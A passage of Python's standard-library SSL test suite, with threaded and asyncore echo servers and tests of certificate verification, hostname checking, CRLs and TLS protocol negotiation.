outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_NONE
sslobj = ctx.wrap_bio(incoming, outgoing, False)
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
req = b'FOO\n'
self.ssl_io_loop(sock, incoming, outgoing, sslobj.write, req)
buf = self.ssl_io_loop(sock, incoming, outgoing, sslobj.read, 1024)
self.assertEqual(buf, b'foo\n')
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
class NetworkedTests(unittest.TestCase):
def test_timeout_connect_ex(self):
# Issue #12065: on a timeout, connect_ex() should return the original
# errno (mimicking the behaviour of non-SSL sockets).
with support.transient_internet(REMOTE_HOST):
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.settimeout(0.0000001)
rc = s.connect_ex((REMOTE_HOST, 443))
if rc == 0:
self.skipTest("REMOTE_HOST responded too quickly")
self.assertIn(rc, (errno.EAGAIN, errno.EWOULDBLOCK))
@unittest.skipUnless(support.IPV6_ENABLED, 'Needs IPv6')
def test_get_server_certificate_ipv6(self):
with support.transient_internet('ipv6.google.com'):
_test_get_server_certificate(self, 'ipv6.google.com', 443)
_test_get_server_certificate_fail(self, 'ipv6.google.com', 443)
def _test_get_server_certificate(test, host, port, cert=None):
pem = ssl.get_server_certificate((host, port))
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
pem = ssl.get_server_certificate((host, port), ca_certs=cert)
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
if support.verbose:
sys.stdout.write("\nVerified certificate for %s:%s is\n%s\n" % (host, port ,pem))
def _test_get_server_certificate_fail(test, host, port):
try:
pem = ssl.get_server_certificate((host, port), ca_certs=CERTFILE)
except ssl.SSLError as x:
#should fail
if support.verbose:
sys.stdout.write("%s\n" % x)
else:
test.fail("Got server certificate %s for %s:%s!" % (pem, host, port))
from test.ssl_servers import make_https_server
class ThreadedEchoServer(threading.Thread):
class ConnectionHandler(threading.Thread):
"""A mildly complicated class, because we want it to work both
with and without the SSL wrapper around the socket connection, so
that we can test the STARTTLS functionality."""
def __init__(self, server, connsock, addr):
self.server = server
self.running = False
self.sock = connsock
self.addr = addr
self.sock.setblocking(True)
self.sslconn = None
threading.Thread.__init__(self)
self.daemon = True
def wrap_conn(self):
try:
self.sslconn = self.server.context.wrap_socket(
self.sock, server_side=True)
self.server.selected_npn_protocols.append(self.sslconn.selected_npn_protocol())
self.server.selected_alpn_protocols.append(self.sslconn.selected_alpn_protocol())
except (ConnectionResetError, BrokenPipeError, ConnectionAbortedError) as e:
# We treat ConnectionResetError as though it were an
# SSLError - OpenSSL on Ubuntu abruptly closes the
# connection when asked to use an unsupported protocol.
#
# BrokenPipeError is raised in TLS 1.3 mode, when OpenSSL
# tries to send session tickets after handshake.
# https://github.com/openssl/openssl/issues/6342
#
# ConnectionAbortedError is raised in TLS 1.3 mode, when OpenSSL
# tries to send session tickets after handshake when using WinSock.
self.server.conn_errors.append(str(e))
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.close()
return False
except (ssl.SSLError, OSError) as e:
# OSError may occur with wrong protocols, e.g. both
# sides use PROTOCOL_TLS_SERVER.
#
# XXX Various errors can have happened here, for example
# a mismatching protocol version, an invalid certificate,
# or a low-level bug. This should be made more discriminating.
#
# bpo-31323: Store the exception as string to prevent
# a reference leak: server -> conn_errors -> exception
# -> traceback -> self (ConnectionHandler) -> server
self.server.conn_errors.append(str(e))
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.server.stop()
self.close()
return False
else:
self.server.shared_ciphers.append(self.sslconn.shared_ciphers())
if self.server.context.verify_mode == ssl.CERT_REQUIRED:
cert = self.sslconn.getpeercert()
if support.verbose and self.server.chatty:
sys.stdout.write(" client cert is " + pprint.pformat(cert) + "\n")
cert_binary = self.sslconn.getpeercert(True)
if support.verbose and self.server.chatty:
sys.stdout.write(" cert binary is " + str(len(cert_binary)) + " bytes\n")
cipher = self.sslconn.cipher()
if support.verbose and self.server.chatty:
sys.stdout.write(" server: connection cipher is now " + str(cipher) + "\n")
sys.stdout.write(" server: selected protocol is now "
+ str(self.sslconn.selected_npn_protocol()) + "\n")
return True
def read(self):
if self.sslconn:
return self.sslconn.read()
else:
return self.sock.recv(1024)
def write(self, bytes):
if self.sslconn:
return self.sslconn.write(bytes)
else:
return self.sock.send(bytes)
def close(self):
if self.sslconn:
self.sslconn.close()
else:
self.sock.close()
def run(self):
self.running = True
if not self.server.starttls_server:
if not self.wrap_conn():
return
while self.running:
try:
msg = self.read()
stripped = msg.strip()
if not stripped:
# eof, so quit this handler
self.running = False
try:
self.sock = self.sslconn.unwrap()
except OSError:
# Many tests shut the TCP connection down
# without an SSL shutdown. This causes
# unwrap() to raise OSError with errno=0!
pass
else:
self.sslconn = None
self.close()
elif stripped == b'over':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: client closed connection\n")
self.close()
return
elif (self.server.starttls_server and
stripped == b'STARTTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read STARTTLS from client, sending OK...\n")
self.write(b"OK\n")
if not self.wrap_conn():
return
elif (self.server.starttls_server and self.sslconn
and stripped == b'ENDTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read ENDTLS from client, sending OK...\n")
self.write(b"OK\n")
self.sock = self.sslconn.unwrap()
self.sslconn = None
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: connection is now unencrypted...\n")
elif stripped == b'CB tls-unique':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read CB tls-unique from client, sending our CB data...\n")
data = self.sslconn.get_channel_binding("tls-unique")
self.write(repr(data).encode("us-ascii") + b"\n")
elif stripped == b'PHA':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: initiating post handshake auth\n")
try:
self.sslconn.verify_client_post_handshake()
except ssl.SSLError as e:
self.write(repr(e).encode("us-ascii") + b"\n")
else:
self.write(b"OK\n")
elif stripped == b'HASCERT':
if self.sslconn.getpeercert() is not None:
self.write(b'TRUE\n')
else:
self.write(b'FALSE\n')
elif stripped == b'GETCERT':
cert = self.sslconn.getpeercert()
self.write(repr(cert).encode("us-ascii") + b"\n")
else:
if (support.verbose and
self.server.connectionchatty):
ctype = (self.sslconn and "encrypted") or "unencrypted"
sys.stdout.write(" server: read %r (%s), sending back %r (%s)...\n"
% (msg, ctype, msg.lower(), ctype))
self.write(msg.lower())
except (ConnectionResetError, ConnectionAbortedError):
# XXX: OpenSSL 1.1.1 sometimes raises ConnectionResetError
# when connection is not shut down gracefully.
if self.server.chatty and support.verbose:
sys.stdout.write(
" Connection reset by peer: {}\n".format(
self.addr)
)
self.close()
self.running = False
except ssl.SSLError as err:
# On Windows sometimes test_pha_required_nocert receives the
# PEER_DID_NOT_RETURN_A_CERTIFICATE exception
# before the 'tlsv13 alert certificate required' exception.
# If the server is stopped when PEER_DID_NOT_RETURN_A_CERTIFICATE
# is received test_pha_required_nocert fails with ConnectionResetError
# because the underlying socket is closed
if 'PEER_DID_NOT_RETURN_A_CERTIFICATE' == err.reason:
if self.server.chatty and support.verbose:
sys.stdout.write(err.args[1])
# test_pha_required_nocert is expecting this exception
raise ssl.SSLError('tlsv13 alert certificate required')
except OSError:
if self.server.chatty:
handle_error("Test server failure:\n")
self.close()
self.running = False
# normally, we'd just stop here, but for the test
# harness, we want to stop the server
self.server.stop()
def __init__(self, certificate=None, ssl_version=None,
certreqs=None, cacerts=None,
chatty=True, connectionchatty=False, starttls_server=False,
npn_protocols=None, alpn_protocols=None,
ciphers=None, context=None):
if context:
self.context = context
else:
self.context = ssl.SSLContext(ssl_version
if ssl_version is not None
else ssl.PROTOCOL_TLS_SERVER)
self.context.verify_mode = (certreqs if certreqs is not None
else ssl.CERT_NONE)
if cacerts:
self.context.load_verify_locations(cacerts)
if certificate:
self.context.load_cert_chain(certificate)
if npn_protocols:
self.context.set_npn_protocols(npn_protocols)
if alpn_protocols:
self.context.set_alpn_protocols(alpn_protocols)
if ciphers:
self.context.set_ciphers(ciphers)
self.chatty = chatty
self.connectionchatty = connectionchatty
self.starttls_server = starttls_server
self.sock = socket.socket()
self.port = support.bind_port(self.sock)
self.flag = None
self.active = False
self.selected_npn_protocols = []
self.selected_alpn_protocols = []
self.shared_ciphers = []
self.conn_errors = []
threading.Thread.__init__(self)
self.daemon = True
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
self.stop()
self.join()
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.sock.settimeout(0.05)
self.sock.listen()
self.active = True
if self.flag:
# signal an event
self.flag.set()
while self.active:
try:
newconn, connaddr = self.sock.accept()
if support.verbose and self.chatty:
sys.stdout.write(' server: new connection from '
+ repr(connaddr) + '\n')
handler = self.ConnectionHandler(self, newconn, connaddr)
handler.start()
handler.join()
except socket.timeout:
pass
except KeyboardInterrupt:
self.stop()
except BaseException as e:
if support.verbose and self.chatty:
sys.stdout.write(
' connection handling failed: ' + repr(e) + '\n')
self.sock.close()
def stop(self):
self.active = False
class AsyncoreEchoServer(threading.Thread):
# this one's based on asyncore.dispatcher
class EchoServer (asyncore.dispatcher):
class ConnectionHandler(asyncore.dispatcher_with_send):
def __init__(self, conn, certfile):
self.socket = test_wrap_socket(conn, server_side=True,
certfile=certfile,
do_handshake_on_connect=False)
asyncore.dispatcher_with_send.__init__(self, self.socket)
self._ssl_accepting = True
self._do_ssl_handshake()
def readable(self):
if isinstance(self.socket, ssl.SSLSocket):
while self.socket.pending() > 0:
self.handle_read_event()
return True
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except (ssl.SSLWantReadError, ssl.SSLWantWriteError):
return
except ssl.SSLEOFError:
return self.handle_close()
except ssl.SSLError:
raise
except OSError as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def handle_read(self):
if self._ssl_accepting:
self._do_ssl_handshake()
else:
data = self.recv(1024)
if support.verbose:
sys.stdout.write(" server: read %s from client\n" % repr(data))
if not data:
self.close()
else:
self.send(data.lower())
def handle_close(self):
self.close()
if support.verbose:
sys.stdout.write(" server: closed connection %s\n" % self.socket)
def handle_error(self):
raise
def __init__(self, certfile):
self.certfile = certfile
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(sock, '')
asyncore.dispatcher.__init__(self, sock)
self.listen(5)
def handle_accepted(self, sock_obj, addr):
if support.verbose:
sys.stdout.write(" server: new connection from %s:%s\n" %addr)
self.ConnectionHandler(sock_obj, self.certfile)
def handle_error(self):
raise
def __init__(self, certfile):
self.flag = None
self.active = False
self.server = self.EchoServer(certfile)
self.port = self.server.port
threading.Thread.__init__(self)
self.daemon = True
def __str__(self):
return "<%s %s>" % (self.__class__.__name__, self.server)
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
if support.verbose:
sys.stdout.write(" cleanup: stopping server.\n")
self.stop()
if support.verbose:
sys.stdout.write(" cleanup: joining server thread.\n")
self.join()
if support.verbose:
sys.stdout.write(" cleanup: successfully joined.\n")
# make sure that ConnectionHandler is removed from socket_map
asyncore.close_all(ignore_all=True)
def start (self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.active = True
if self.flag:
self.flag.set()
while self.active:
try:
asyncore.loop(1)
except:
pass
def stop(self):
self.active = False
self.server.close()
def server_params_test(client_context, server_context, indata=b"FOO\n",
chatty=True, connectionchatty=False, sni_name=None,
session=None):
"""
Launch a server, connect a client to it and try various reads
and writes.
"""
stats = {}
server = ThreadedEchoServer(context=server_context,
chatty=chatty,
connectionchatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=sni_name, session=session) as s:
s.connect((HOST, server.port))
for arg in [indata, bytearray(indata), memoryview(indata)]:
if connectionchatty:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(arg)
outdata = s.read()
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
raise AssertionError(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
stats.update({
'compression': s.compression(),
'cipher': s.cipher(),
'peercert': s.getpeercert(),
'client_alpn_protocol': s.selected_alpn_protocol(),
'client_npn_protocol': s.selected_npn_protocol(),
'version': s.version(),
'session_reused': s.session_reused,
'session': s.session,
})
s.close()
stats['server_alpn_protocols'] = server.selected_alpn_protocols
stats['server_npn_protocols'] = server.selected_npn_protocols
stats['server_shared_ciphers'] = server.shared_ciphers
return stats
def try_protocol_combo(server_protocol, client_protocol, expect_success,
certsreqs=None, server_options=0, client_options=0):
"""
Try to SSL-connect using *client_protocol* to *server_protocol*.
If *expect_success* is true, assert that the connection succeeds,
if it's false, assert that the connection fails.
Also, if *expect_success* is a string, assert that it is the protocol
version actually used by the connection.
"""
if certsreqs is None:
certsreqs = ssl.CERT_NONE
certtype = {
ssl.CERT_NONE: "CERT_NONE",
ssl.CERT_OPTIONAL: "CERT_OPTIONAL",
ssl.CERT_REQUIRED: "CERT_REQUIRED",
}[certsreqs]
if support.verbose:
formatstr = (expect_success and " %s->%s %s\n") or " {%s->%s} %s\n"
sys.stdout.write(formatstr %
(ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol),
certtype))
client_context = ssl.SSLContext(client_protocol)
client_context.options |= client_options
server_context = ssl.SSLContext(server_protocol)
server_context.options |= server_options
min_version = PROTOCOL_TO_TLS_VERSION.get(client_protocol, None)
if (min_version is not None
# SSLContext.minimum_version is only available on recent OpenSSL
# (setter added in OpenSSL 1.1.0, getter added in OpenSSL 1.1.1)
and hasattr(server_context, 'minimum_version')
and server_protocol == ssl.PROTOCOL_TLS
and server_context.minimum_version > min_version):
# If OpenSSL configuration is strict and requires more recent TLS
# version, we have to change the minimum to test old TLS versions.
server_context.minimum_version = min_version
# NOTE: we must enable "ALL" ciphers on the client, otherwise an
# SSLv23 client will send an SSLv3 hello (rather than SSLv2)
# starting from OpenSSL 1.0.0 (see issue #8322).
if client_context.protocol == ssl.PROTOCOL_TLS:
client_context.set_ciphers("ALL")
for ctx in (client_context, server_context):
ctx.verify_mode = certsreqs
ctx.load_cert_chain(SIGNED_CERTFILE)
ctx.load_verify_locations(SIGNING_CA)
try:
stats = server_params_test(client_context, server_context,
chatty=False, connectionchatty=False)
# Protocol mismatch can result in either an SSLError, or a
# "Connection reset by peer" error.
except ssl.SSLError:
if expect_success:
raise
except OSError as e:
if expect_success or e.errno != errno.ECONNRESET:
raise
else:
if not expect_success:
raise AssertionError(
"Client protocol %s succeeded with server protocol %s!"
% (ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol)))
elif (expect_success is not True
and expect_success != stats['version']):
raise AssertionError("version mismatch: expected %r, got %r"
% (expect_success, stats['version']))
class ThreadedTests(unittest.TestCase):
def test_echo(self):
"""Basic test of an SSL client connecting to a server"""
if support.verbose:
sys.stdout.write("\n")
for protocol in PROTOCOLS:
if protocol in {ssl.PROTOCOL_TLS_CLIENT, ssl.PROTOCOL_TLS_SERVER}:
continue
if not has_tls_protocol(protocol):
continue
with self.subTest(protocol=ssl._PROTOCOL_NAMES[protocol]):
context = ssl.SSLContext(protocol)
context.load_cert_chain(CERTFILE)
server_params_test(context, context,
chatty=True, connectionchatty=True)
client_context, server_context, hostname = testing_context()
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_SERVER):
server_params_test(client_context=client_context,
server_context=server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
client_context.check_hostname = False
with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=client_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIn('called a function you should not call',
str(e.exception))
with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_SERVER):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=server_context,
chatty=True, connectionchatty=True)
self.assertIn('called a function you should not call',
str(e.exception))
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=client_context,
chatty=True, connectionchatty=True)
self.assertIn('called a function you should not call',
str(e.exception))
def test_getpeercert(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
do_handshake_on_connect=False,
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# getpeercert() raise ValueError while the handshake isn't
# done.
with self.assertRaises(ValueError):
s.getpeercert()
s.do_handshake()
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()
if support.verbose:
sys.stdout.write(pprint.pformat(cert) + '\n')
sys.stdout.write("Connection cipher is " + str(cipher) + '.\n')
if 'subject' not in cert:
self.fail("No subject field in certificate: %s." %
pprint.pformat(cert))
if ((('organizationName', 'Python Software Foundation'),)
not in cert['subject']):
self.fail(
"Missing or invalid 'organizationName' field in certificate subject; "
"should be 'Python Software Foundation'.")
self.assertIn('notBefore', cert)
self.assertIn('notAfter', cert)
before = ssl.cert_time_to_seconds(cert['notBefore'])
after = ssl.cert_time_to_seconds(cert['notAfter'])
self.assertLess(before, after)
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_crl_check(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(client_context.verify_flags, ssl.VERIFY_DEFAULT | tf)
# VERIFY_DEFAULT should pass
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# VERIFY_CRL_CHECK_LEAF without a loaded CRL file fails
client_context.verify_flags |= ssl.VERIFY_CRL_CHECK_LEAF
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaisesRegex(ssl.SSLError,
"certificate verify failed"):
s.connect((HOST, server.port))
# now load a CRL file. The CRL file is signed by the CA.
client_context.load_verify_locations(CRLFILE)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
def test_check_hostname(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname="invalid") as s:
with self.assertRaisesRegex(
ssl.CertificateError,
"Hostname mismatch, certificate is not valid for 'invalid'."):
s.connect((HOST, server.port))
# missing server_hostname arg should cause an exception, too
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with socket.socket() as s:
with self.assertRaisesRegex(ValueError,
"check_hostname requires server_hostname"):
client_context.wrap_socket(s)
def test_ecc_cert(self):
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
client_context.set_ciphers('ECDHE:ECDSA:!NULL:!aRSA')
hostname = SIGNED_CERTFILE_ECC_HOSTNAME
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# load ECC cert
server_context.load_cert_chain(SIGNED_CERTFILE_ECC)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()[0].split('-')
self.assertTrue(cipher[:2], ('ECDHE', 'ECDSA'))
def test_dual_rsa_ecc(self):
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
# TODO: fix TLSv1.3 once SSLContext can restrict signature
# algorithms.
client_context.options |= ssl.OP_NO_TLSv1_3
# only ECDSA certs
client_context.set_ciphers('ECDHE:ECDSA:!NULL:!aRSA')
hostname = SIGNED_CERTFILE_ECC_HOSTNAME
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# load ECC and RSA key/cert pairs
server_context.load_cert_chain(SIGNED_CERTFILE_ECC)
server_context.load_cert_chain(SIGNED_CERTFILE)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()[0].split('-')
self.assertTrue(cipher[:2], ('ECDHE', 'ECDSA'))
def test_check_hostname_idn(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(IDNSANSFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.verify_mode = ssl.CERT_REQUIRED
context.check_hostname = True
context.load_verify_locations(SIGNING_CA)
# correct hostname should verify, when specified in several
# different ways
idn_hostnames = [
('kรถnig.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
('xn--knig-5qa.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
(b'xn--knig-5qa.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
('kรถnigsgรครchen.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
('xn--knigsgsschen-lcb0w.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
(b'xn--knigsgsschen-lcb0w.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
# ('kรถnigsgรครchen.idna2008.pythontest.net',
# 'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
('xn--knigsgchen-b4a3dun.idna2008.pythontest.net',
'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
(b'xn--knigsgchen-b4a3dun.idna2008.pythontest.net',
'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
]
for server_hostname, expected_hostname in idn_hostnames:
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname=server_hostname) as s:
self.assertEqual(s.server_hostname, expected_hostname)
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertEqual(s.server_hostname, expected_hostname)
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname="python.example.org") as s:
with self.assertRaises(ssl.CertificateError):
s.connect((HOST, server.port))
def test_wrong_cert_tls12(self):
"""Connecting when the server rejects the client's certificate
Launch a server with CERT_REQUIRED, and check that trying to
connect to it with a wrong client certificate fails.
"""
client_context, server_context, hostname = testing_context()
# load client cert that is not signed by trusted CA
client_context.load_cert_chain(CERTFILE)
# require TLS client authentication
server_context.verify_mode = ssl.CERT_REQUIRED
# TLS 1.3 has different handshake
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
server = ThreadedEchoServer(
context=server_context, chatty=True, connectionchatty=True,
)
with server, \
client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
try:
# Expect either an SSL error about the server rejecting
# the connection, or a low-level connection reset (which
# sometimes happens on Windows)
s.connect((HOST, server.port))
except ssl.SSLError as e:
if support.verbose:
sys.stdout.write("\nSSLError is %r\n" % e)
except OSError as e:
if e.errno != errno.ECONNRESET:
raise
if support.verbose:
sys.stdout.write("\nsocket.error is %r\n" % e)
else:
self.fail("Use of invalid cert should have failed!")
@requires_tls_version('TLSv1_3')
def test_wrong_cert_tls13(self):
client_context, server_context, hostname = testing_context()
# load client cert that is not signed by trusted CA
client_context.load_cert_chain(CERTFILE)
server_context.verify_mode = ssl.CERT_REQUIRED
server_context.minimum_version = ssl.TLSVersion.TLSv1_3
client_context.minimum_version = ssl.TLSVersion.TLSv1_3
server = ThreadedEchoServer(
context=server_context, chatty=True, connectionchatty=True,
)
with server, \
client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# TLS 1.3 perform client cert exchange after handshake
s.connect((HOST, server.port))
try:
s.write(b'data')
s.read(4)
except ssl.SSLError as e:
if support.verbose:
sys.stdout.write("\nSSLError is %r\n" % e)
except OSError as e:
if e.errno != errno.ECONNRESET:
raise
if support.verbose:
sys.stdout.write("\nsocket.error is %r\n" % e)
else:
self.fail("Use of invalid cert should have failed!")
def test_rude_shutdown(self):
"""A brutal shutdown of an SSL server should raise an OSError
in the client when attempting handshake.
"""
listener_ready = threading.Event()
listener_gone = threading.Event()
s = socket.socket()
port = support.bind_port(s, HOST)
# `listener` runs in a thread. It sits in an accept() until
# the main thread connects. Then it rudely closes the socket,
# and sets Event `listener_gone` to let the main thread know
# the socket is gone.
def listener():
s.listen()
listener_ready.set()
newsock, addr = s.accept()
newsock.close()
s.close()
listener_gone.set()
def connector():
listener_ready.wait()
with socket.socket() as c:
c.connect((HOST, port))
listener_gone.wait()
try:
ssl_sock = test_wrap_socket(c)
except OSError:
pass
else:
self.fail('connecting to closed SSL socket should have failed')
t = threading.Thread(target=listener)
t.start()
try:
connector()
finally:
t.join()
def test_ssl_cert_verify_error(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
try:
s.connect((HOST, server.port))
except ssl.SSLError as e:
msg = 'unable to get local issuer certificate'
self.assertIsInstance(e, ssl.SSLCertVerificationError)
self.assertEqual(e.verify_code, 20)
self.assertEqual(e.verify_message, msg)
self.assertIn(msg, repr(e))
self.assertIn('certificate verify failed', repr(e))
@requires_tls_version('SSLv2')
def test_protocol_sslv2(self):
"""Connecting to an SSLv2 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLSv1, False)
# SSLv23 client with specific SSL options
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_SSLv2)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1)
def test_PROTOCOL_TLS(self):
"""Connecting to an SSLv23 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
if has_tls_version('SSLv2'):
try:
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv2, True)
except OSError as x:
# this fails on some older versions of OpenSSL (0.9.7l, for instance)
if support.verbose:
sys.stdout.write(
" SSL2 client to SSL23 server test unexpectedly failed:\n %s\n"
% str(x))
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True)
if has_tls_version('TLSv1'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1')
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True, ssl.CERT_OPTIONAL)
if has_tls_version('TLSv1'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
if has_tls_version('SSLv3'):
